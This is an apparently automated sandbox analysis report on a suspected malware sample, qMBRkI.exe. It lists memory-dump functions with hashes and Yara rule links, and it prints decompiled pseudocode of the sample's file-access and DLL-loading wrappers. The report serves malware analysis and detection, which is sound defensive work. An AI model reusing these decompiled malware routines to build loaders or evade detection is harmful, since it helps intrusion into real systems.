                                                                                                                                                    • Instruction ID: f55068791447b4fa3fee747e895de1b939da6ef61728c5ba9d503746199c1857
                                                                                                                                                    • Opcode Fuzzy Hash: d21fb86c83091b7a525c919304107142fe5b4c629f597eba0f60a0b5bea0b5e1
                                                                                                                                                    • Instruction Fuzzy Hash: 65227FB5A10619EFCB24DF64C480A9EB7F2FF88314F188969D905AB360DB71EC45CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAD6A8, Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                    • Opcode ID: 1fce30ef2b364c105115ae3353b8b211deb661b20747f37286ec57ce49be201d
                                                                                                                                                    • Instruction ID: 7913048758bc26e101962d5d4f379e6aab071346e245ab20845ad104a44e9595
                                                                                                                                                    • Opcode Fuzzy Hash: 1fce30ef2b364c105115ae3353b8b211deb661b20747f37286ec57ce49be201d
                                                                                                                                                    • Instruction Fuzzy Hash: 49E127B4B10209DFCB14DF68C48499DBBF2FF88318B1489A9E5059B369DB70EC46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAF100, Relevance: .3, Instructions: 337COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8c8ecfd014ceb30f15f73160f4478b6d7ed959e29bede9d114b5233666660c70
                                                                                                                                                    • Instruction ID: 85183fae7e7758e160b9a6c33bac7908a032f6bdb641c5aae9873221c4b3ec00
                                                                                                                                                    • Opcode Fuzzy Hash: 8c8ecfd014ceb30f15f73160f4478b6d7ed959e29bede9d114b5233666660c70
                                                                                                                                                    • Instruction Fuzzy Hash: A3C1B1B5E00205EFCB15DF64D494AAEBBF2EF88314F188469D9169F290DB34ED41CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAB6F0, Relevance: .3, Instructions: 254COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 406036152ddabb155aeb5e61e19aef12bdfb888e1c526f69f90370f1547853b8
                                                                                                                                                    • Instruction ID: 9f9ee9994f550d5e2068994796261e5be0d8b33492978c4b511941572242a7bc
                                                                                                                                                    • Opcode Fuzzy Hash: 406036152ddabb155aeb5e61e19aef12bdfb888e1c526f69f90370f1547853b8
                                                                                                                                                    • Instruction Fuzzy Hash: 32A193B92147059BD320EB64D44826A77E2EB89325F24CE1CD2774F7E0CB75E8868B52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAB700, Relevance: .2, Instructions: 249COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: adceeea8345756b4a5a6fcbd48ec66ff0c93d86675ae3e5bf7e10fec2da37af6
                                                                                                                                                    • Instruction ID: 86b0aefcf91d862ad6b8bd6a9858853c7a7ff30f060e4d9f19045fb03a63c80a
                                                                                                                                                    • Opcode Fuzzy Hash: adceeea8345756b4a5a6fcbd48ec66ff0c93d86675ae3e5bf7e10fec2da37af6
                                                                                                                                                    • Instruction Fuzzy Hash: 3AA183B92147059BD320EB64D44826E77E2EB89325F24CE1CD2774F7E0CB75E8868B52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAF412, Relevance: .1, Instructions: 105COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: be3ebb8e7181cd95e63887042427cec4bc51a7528924cc55ff2e5372b9aceec0
                                                                                                                                                    • Instruction ID: a2ef558d435deed6c1df5a2fb097d900ef82c8fdd1d3a4d4122876781c119281
                                                                                                                                                    • Opcode Fuzzy Hash: be3ebb8e7181cd95e63887042427cec4bc51a7528924cc55ff2e5372b9aceec0
                                                                                                                                                    • Instruction Fuzzy Hash: 7B416EB4E10205EFDF18CF64D455AAEBBB2FF88314F288529E816AB350DB75E941CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FACF28, Relevance: .1, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b21df0ed573b89620127888af50ae7634a5060bdde6a6f27dec81a976fa4dd7a
                                                                                                                                                    • Instruction ID: e015f3421b897e6d62cc6d8f90abeef95c7a6f883b8dc5ee78fddad3491ab1e6
                                                                                                                                                    • Opcode Fuzzy Hash: b21df0ed573b89620127888af50ae7634a5060bdde6a6f27dec81a976fa4dd7a
                                                                                                                                                    • Instruction Fuzzy Hash: 0F3128B47007059FC714EF78D854A6ABBF5EF88215B148529E22ACB364DB30EC45CB71
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAD8EE, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e8037350d9b85761b7c602da885874846faebff2856cbc6eabda5380c03292d3
                                                                                                                                                    • Instruction ID: af0a44d56242f8845fbf54bfcf2fccb2beb05a5003f117a855918fcafe238ee2
                                                                                                                                                    • Opcode Fuzzy Hash: e8037350d9b85761b7c602da885874846faebff2856cbc6eabda5380c03292d3
                                                                                                                                                    • Instruction Fuzzy Hash: 4E3159B8B00209CFCB20DB74D854AADB7F6EF98359F048968D5469B754DB70EC05CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAE918, Relevance: .1, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3def5164a687976a31a433d574c076455d0e82dca7a4478d27fad5b7fe4742f7
                                                                                                                                                    • Instruction ID: 590ce01e6e53b4f3a66a6d5ac37982328e72da261bdd6d3da1d18934cf406759
                                                                                                                                                    • Opcode Fuzzy Hash: 3def5164a687976a31a433d574c076455d0e82dca7a4478d27fad5b7fe4742f7
                                                                                                                                                    • Instruction Fuzzy Hash: 542153B5B00209DBDB14EB65E859AAE7BB6EFC8351F148069E902D7390DF759D00CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FACF19, Relevance: .0, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 44f9934f203a516022f3040229232fdfa7052b9a70fc60fbb30e2234f05ff886
                                                                                                                                                    • Instruction ID: 5e338dffc258a75c78a20996e04958988f372107baf96f1828be98c35264f8cb
                                                                                                                                                    • Opcode Fuzzy Hash: 44f9934f203a516022f3040229232fdfa7052b9a70fc60fbb30e2234f05ff886
                                                                                                                                                    • Instruction Fuzzy Hash: 2701D274601606DFCB10EF68D854A9EBBF5EF85219B084569E208DF265EB70AD08C7B2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0326D01D, Relevance: .0, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.359012438.000000000326D000.00000040.00000001.sdmp, Offset: 0326D000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c06795e824f92244ae2ad3473e494d156cef53099808dbf67c8c29e7f6ddbe38
                                                                                                                                                    • Instruction ID: 32cc58977672d9cad5658c9333307dc5ada249b12126f2631db22e19b3eaf540
                                                                                                                                                    • Opcode Fuzzy Hash: c06795e824f92244ae2ad3473e494d156cef53099808dbf67c8c29e7f6ddbe38
                                                                                                                                                    • Instruction Fuzzy Hash: 1A01F771628788AAD720CA25CCC4B63FBCCEF85328F18855AED040B242C379D5C5C6B2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0326D006, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.359012438.000000000326D000.00000040.00000001.sdmp, Offset: 0326D000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d4d96fc1d0364d15757faf49e9c9a2c0074b3f05be78b59da4d3dde9fbc25c93
                                                                                                                                                    • Instruction ID: cf9c5f868117a3b02b7c261dcf815f466c7dfcdfcbf547406959d0c0e1feb748
                                                                                                                                                    • Opcode Fuzzy Hash: d4d96fc1d0364d15757faf49e9c9a2c0074b3f05be78b59da4d3dde9fbc25c93
                                                                                                                                                    • Instruction Fuzzy Hash: 64014C6150D7C49FD7128B258C94B52BFB8EF43224F1D81CBD9848F2A3C2699888C7B2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAC6CE, Relevance: .0, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9de9b7e8a5ef00b060b2923dc286261b5796ecf2ca6e4c71cf0d6d4d17bc8877
                                                                                                                                                    • Instruction ID: 89d46ebbf57e5dcf8e6b67d82466d82e735dc35c8eae7eee50ea2a8a53f506b2
                                                                                                                                                    • Opcode Fuzzy Hash: 9de9b7e8a5ef00b060b2923dc286261b5796ecf2ca6e4c71cf0d6d4d17bc8877
                                                                                                                                                    • Instruction Fuzzy Hash: 05E0C2BB6102059BD710EBA4E0052ED73A2DF84366F404939D2268B740CB74E88A8786
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAC20E, Relevance: .0, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 75b38ef61d2000f91be63f41d4b1810d10d69b8c358ad52f2454893ea79adabe
                                                                                                                                                    • Instruction ID: bf803060a26d6b5b4c88222de37b99798602b60ba0e531e96b16bbdb75ad4946
                                                                                                                                                    • Opcode Fuzzy Hash: 75b38ef61d2000f91be63f41d4b1810d10d69b8c358ad52f2454893ea79adabe
                                                                                                                                                    • Instruction Fuzzy Hash: F2E0C2BB21020497D710E7A4F0052AE77A2DB84366F044839D3168B740CB74E88A8786
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAC1CE, Relevance: .0, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1bf387593e5c3417d6b8402fe530714084c05821ff92041427efc9c6c809db2f
                                                                                                                                                    • Instruction ID: c40da14fde6c3677ca3e00ac88fe7c162797d9ca77db4e07f56d6bb860fbf356
                                                                                                                                                    • Opcode Fuzzy Hash: 1bf387593e5c3417d6b8402fe530714084c05821ff92041427efc9c6c809db2f
                                                                                                                                                    • Instruction Fuzzy Hash: 5EE0C2BB21160497D710E7A4F0452EE77A2DB84366F008939D31A8B740CB74E88A8786
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FAC10E, Relevance: .0, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3889097b6f0491471dbc0c141533ca2dd6461067298e157df2141ef45fc8127c
                                                                                                                                                    • Instruction ID: 2c8e33f460a84369f12bbf1f18dc201fb5402484c9a527297fef1ee2cf5be2ea
                                                                                                                                                    • Opcode Fuzzy Hash: 3889097b6f0491471dbc0c141533ca2dd6461067298e157df2141ef45fc8127c
                                                                                                                                                    • Instruction Fuzzy Hash: 7CE0C2BB61020597D710EBA4F0052AE77A2DB84336F448839D3168B740DF74E88A8B86
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 07FA5138, Relevance: .4, Instructions: 450COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f6cd52aadb5561d1a09fa28306e04615a0e22041e5d5c7c8a2a80bdec1476ce8
                                                                                                                                                    • Instruction ID: a167c0b1d024a1d46cbd54ac47ed79fe89778a4dfe5f4791d0bab7697e11b65b
                                                                                                                                                    • Opcode Fuzzy Hash: f6cd52aadb5561d1a09fa28306e04615a0e22041e5d5c7c8a2a80bdec1476ce8
                                                                                                                                                    • Instruction Fuzzy Hash: 85E1D0B5B00201EFCB14DB78D854A6EBBF2EFC9214B188469E906CB390DB74DC45CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 07FA0040, Relevance: .2, Instructions: 237COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.369083160.0000000007FA0000.00000040.00000001.sdmp, Offset: 07FA0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 016ef47783fea7c3fffcf11d53cebc3dcebb0b33ab08c6638729cd6c84be0614
                                                                                                                                                    • Instruction ID: 45bd4234a583c85f966acf9dc7d0e255468a57c097522b65b8ac15b8c2a2e7de
                                                                                                                                                    • Opcode Fuzzy Hash: 016ef47783fea7c3fffcf11d53cebc3dcebb0b33ab08c6638729cd6c84be0614
                                                                                                                                                    • Instruction Fuzzy Hash: D58150B4A00209EFDB14DFB9D8546AEBBF6EFC8304F148429E506DB354EF7498468B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Analysis Process: qMBRkI.exe PID: 4652 Parent PID: 6204 qMBRkI.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00E48280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00E48280(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00E48DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0xe43a21
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                                                                                                                                    0x00e48283
                                                                                                                                                    0x00e4828f
                                                                                                                                                    0x00e48297
                                                                                                                                                    0x00e4829c
                                                                                                                                                    0x00e482c5
                                                                                                                                                    0x00e482c9

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 00E482C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:
                                                                                                                                                    • API String ID: 2738559852-3508929463
                                                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction ID: 0b8343aff15859bffb46d22222de0259003bff42ae7aef91ccb297b05c27c386
                                                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0A9B2200108ABCB14DF89DC91DEB77EDAF8C754F158248BA1D97241D630E8118BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E48300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E48300(intOrPtr _a4, char _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0xe39753
				E00E48DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t4 =  &_a8; // 0xe43d40
				_t8 = NtClose( *_t4); // executed
				return _t8;
			}





                                                                                                                                                    0x00e48303
                                                                                                                                                    0x00e48306
                                                                                                                                                    0x00e4830f
                                                                                                                                                    0x00e48317
                                                                                                                                                    0x00e4831c
                                                                                                                                                    0x00e48325
                                                                                                                                                    0x00e48329

                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(@=,?,?,00E43D40,00E38B03,FFFFFFFF), ref: 00E48325
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID: @=
                                                                                                                                                    • API String ID: 3535843008-3903022579
                                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction ID: 4528f66e31b067839b19392eb54a39534774309155953aece2b86fae30532088
                                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction Fuzzy Hash: C1D012756002146BD710EF98DC45E97779CEF44750F154455BA185B242C570F90086E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E39B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E39B30(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00E4AB60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00E4AF80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00E4B200( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00E49310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                    0x00e39b4c
                                                                                                                                                    0x00e39b4f
                                                                                                                                                    0x00e39b54
                                                                                                                                                    0x00e39b59
                                                                                                                                                    0x00e39b63
                                                                                                                                                    0x00e39b68
                                                                                                                                                    0x00e39b6b
                                                                                                                                                    0x00e39b6d
                                                                                                                                                    0x00e39b75
                                                                                                                                                    0x00e39b7a
                                                                                                                                                    0x00e39b7a
                                                                                                                                                    0x00e39b81
                                                                                                                                                    0x00e39b89
                                                                                                                                                    0x00e39b8c
                                                                                                                                                    0x00e39b8e
                                                                                                                                                    0x00e39ba2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00e39ba4
                                                                                                                                                    0x00e39baa
                                                                                                                                                    0x00e39b5e
                                                                                                                                                    0x00e39b5e
                                                                                                                                                    0x00e39b5e

                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E39BA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: a91b5799f6d6d4ac65690d92c28576a694321215578ddd0e468fd9dea2687942
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: D90121B5E4020DABDF10DBE4EC46FDEB7B89B54308F0441A5E918A7242F671EB18CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E481CC, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E481CC(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t32;

				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00E48DD0(_t32, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                    0x00e481d3
                                                                                                                                                    0x00e481df
                                                                                                                                                    0x00e481e7
                                                                                                                                                    0x00e4821d
                                                                                                                                                    0x00e48221

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00E38B03,?,00E43BA7,00E38B03,FFFFFFFF,?,?,FFFFFFFF,00E38B03,00E43BA7,?,00E38B03,00000060,00000000,00000000), ref: 00E4821D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                                    • Associated: 00000012.00000002.403244215.0000000000E30000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403285089.0000000000E4D000.00000040.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000012.00000002.403299857.0000000000E4E000.00000020.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: d0a17697a94e036f63cfac9294c922b02150eb495b89c9c7d5e26b7e53034ee5
                                                                                                                                                    • Instruction ID: a165562161b41b4f09b11838117be0d4e76435326618cefa0a500cd9dae9b3f8
                                                                                                                                                    • Opcode Fuzzy Hash: d0a17697a94e036f63cfac9294c922b02150eb495b89c9c7d5e26b7e53034ee5
                                                                                                                                                    • Instruction Fuzzy Hash: BFF0B2B2201208ABCB08DF88DC95EEB77EDAF8C754F158248BA0D97241D630EC518BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00E481D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00E481D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00E48DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                    0x00e481df
                                                                                                                                                    0x00e481e7
                                                                                                                                                    0x00e4821d
                                                                                                                                                    0x00e48221

                                                                                                                                                    APIs
